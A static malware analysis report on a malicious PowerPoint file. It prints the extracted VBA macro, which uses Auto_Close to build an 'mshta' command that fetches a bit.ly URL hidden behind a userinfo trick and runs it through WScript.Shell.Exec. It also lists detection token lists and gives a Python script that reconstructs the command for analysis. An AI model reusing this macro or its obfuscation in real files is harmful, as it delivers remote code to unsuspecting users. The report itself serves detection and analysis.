Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 dacf698a3a30d512…

MALICIOUS

Office (OLE) / .PPT

Size: 69.0 KB
Created: 2020-07-01 02:00:23
Authoring application: Microsoft Office PowerPoint
First seen: 2026-06-26
MD5: 5a61c694f8554e2c01b6d03ee0e71991 SHA-1: 7a338609d12e40188e0fcfc8cb727bf93c8795a9 SHA-256: dacf698a3a30d51249a98c1ca7e1d3bacb3c343dd3823eb9eb2c429e352d92ee
Risk score: 270

Heuristics (8)

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    The macro instantiates the WScript.Shell COM object and calls its Exec method, which starts a new process from a command string. Here the string is not a literal but the return value of main(), which assembles it at run time.
    Matched line in script
    CreateObject("WScript.Shell").Exec main
  • VBA WScript mshta shortener downloader critical OLE_VBA_WSHELL_MSHTA_SHORTENER
    VBA auto-exec macro launches WScript.Shell.Exec with command text that resolves to mshta and a URL shortener target. This is a high-confidence downloader/dropper pattern, not an Office parser CVE.
    Matched line in script
    CreateObject("WScript.Shell").Exec main
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject instantiates an arbitrary COM object by ProgID at run time, so the object being used (here "WScript.Shell") is only visible in the string argument, not in the VBA project references.
    Matched line in script
    CreateObject("WScript.Shell").Exec main
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close is the Word/Excel auto-exec entry point for the document-close event; this sample uses it as the trigger that calls calc0(). Caveat for PowerPoint samples: an ordinary presentation does not run Auto_Open/Auto_Close by itself, PowerPoint honours those names only in a loaded add-in, so the static rule identifies the intended trigger without establishing how the file is detonated in the wild.
    Matched line in script
    Sub Auto_close()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://%20%20@bit.ly/53em5i6ee07ethbkuysd Referenced by macro
    The "%20%20@" before the host is the userinfo part of the URL authority (two percent-encoded spaces followed by "@"), so the host mshta actually connects to is bit.ly. Naive matching on the literal "http://bit.ly" would miss this form; parse the URL and compare the host component instead.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  617 bytes
SHA-256: 2c8b2f0604a8cf08cb32f09f794add0fd9a6c2854da6c3ab4bb23156d401253f
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "c1"
Function calc1()

calc1 = "m"

End Function

Attribute VB_Name = "c2"
Function calc2()

calc2 = "s"

End Function

Attribute VB_Name = "c3"
Function calc3()

calc3 = "h"

End Function


Attribute VB_Name = "c4"
Function calc4()

calc4 = "http://%20%20@bit.ly/53em5i6ee07ethbkuysd"

End Function


Attribute VB_Name = "c5"
Function main()

main = calc1 + calc2 + calc3 + "ta " + calc4
End Function

Attribute VB_Name = "m1"
Sub Auto_close()
calc0
End Sub

Attribute VB_Name = "m2"
Function calc0()

CreateObject("WScript.Shell").Exec main
End Function
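The three findings above (OLE_VBA_WSHELL_MSHTA_SHORTENER, OLE_VBA_PCODE_AUTOEXEC_EXEC and the EMBEDDED_URL note) all rest on two steps a reviewer normally does by hand: follow the split-string functions calc1..calc4 through main() to the string handed to WScript.Shell.Exec, and parse the resulting URL so the "%20%20@" prefix is recognised as userinfo rather than part of the host. The following Python does both, plus the auto-exec/execution token pairing the p-code rule describes. It is an added example written for this report, not code from the analysis service or from oletools; the VBA inside it is copied from the macros.bas preview (Attribute lines dropped), and the helper names resolve_exec_command, split_url and autoexec_pairs are this example's own.

```python
"""Reconstruct the command the macro passes to WScript.Shell.Exec and
inspect the URL it contains. Added example; not the analysis service's
or oletools' code. Helper names are this example's own.
"""
import re
from urllib.parse import unquote, urlsplit

# Copied from the macros.bas preview above, Attribute lines dropped.
MACRO_SOURCE = r'''
Function calc1()
calc1 = "m"
End Function
Function calc2()
calc2 = "s"
End Function
Function calc3()
calc3 = "h"
End Function
Function calc4()
calc4 = "http://%20%20@bit.ly/53em5i6ee07ethbkuysd"
End Function
Function main()
main = calc1 + calc2 + calc3 + "ta " + calc4
End Function
Sub Auto_close()
calc0
End Sub
Function calc0()
CreateObject("WScript.Shell").Exec main
End Function
'''

# One VBA "Function <name>() ... End Function" per match.
FUNC_RE = re.compile(r'^\s*Function\s+(\w+)\s*\(\)\s*(.*?)^\s*End Function',
                     re.M | re.S)
# Terms of a string expression: a double-quoted literal or a bare
# identifier (a call to another function). "+" / "&" between them are
# VBA concatenation and are skipped.
TERM_RE = re.compile(r'"([^"]*)"|(\w+)')
EXEC_RE = re.compile(r'CreateObject\("WScript\.Shell"\)\.Exec\s+(.+)')

# Token lists as stated by the OLE_VBA_PCODE_AUTOEXEC_EXEC description.
AUTOEXEC_TOKENS = ('Auto_Open', 'AutoOpen', 'Document_Open', 'Workbook_Open',
                   'Auto_Close', 'AutoClose')
EXEC_TOKENS = ('Shell', 'CreateObject', 'GetObject', 'PowerShell', 'cmd.exe',
               'URLDownloadToFile', 'WinHttp', 'XMLHTTP', 'ADODB.Stream',
               'ShellExecute', 'ExecuteExcel4Macro')


def collect_functions(src):
    """Map each VBA function name to the expression assigned to it.
    VBA returns a value by assigning to the function's own name."""
    funcs = {}
    for name, body in FUNC_RE.findall(src):
        m = re.search(r'^\s*' + re.escape(name) + r'\s*=\s*(.+?)\s*$', body, re.M)
        if m:
            funcs[name] = m.group(1)
    return funcs


def evaluate(expr, funcs, depth=0):
    """Concatenate literals, resolving identifiers by evaluating the
    function they name. Depth-bounded so a cyclic macro cannot hang us."""
    if depth > 32:
        raise RecursionError('string-builder nesting too deep')
    parts = []
    for literal, ident in TERM_RE.findall(expr):
        if ident:
            if ident not in funcs:
                raise KeyError(f'unresolved identifier {ident!r}')
            parts.append(evaluate(funcs[ident], funcs, depth + 1))
        else:
            parts.append(literal)
    return ''.join(parts)


def resolve_exec_command(src):
    """Return the string handed to WScript.Shell.Exec, or None if absent."""
    m = EXEC_RE.search(src)
    if not m:
        return None
    return evaluate(m.group(1).strip(), collect_functions(src))


def split_url(url):
    """Split a URL so that text before "@" in the authority is reported
    as userinfo, not as the host (the bit.ly trick in this sample)."""
    p = urlsplit(url)
    return {'scheme': p.scheme, 'userinfo': unquote(p.username or ''),
            'host': p.hostname, 'path': p.path}


def autoexec_pairs(src):
    """Auto-exec and execution tokens that co-occur in the same source.
    Returns ([], []) unless both kinds are present, mirroring the rule."""
    def hits(tokens):
        return [t for t in tokens
                if re.search(r'(?<!\w)' + re.escape(t) + r'(?!\w)', src, re.I)]
    auto, ex = hits(AUTOEXEC_TOKENS), hits(EXEC_TOKENS)
    return (auto, ex) if auto and ex else ([], [])


if __name__ == '__main__':
    cmd = resolve_exec_command(MACRO_SOURCE)
    prog, _, arg = cmd.partition(' ')
    print('Exec command :', cmd)
    print('Program      :', prog)
    print('URL parts    :', split_url(arg))
    print('Token pair   :', autoexec_pairs(MACRO_SOURCE))
```

Run stand-alone it prints the reassembled command `mshta http://%20%20@bit.ly/53em5i6ee07ethbkuysd`, a host of `bit.ly` with two spaces as userinfo, and the Auto_Close / CreateObject+Shell pairing. The evaluator handles only literal concatenation, which is all this sample needs; samples that build strings with Chr(), StrReverse or Mid() need those intrinsics modelled before the same approach resolves them.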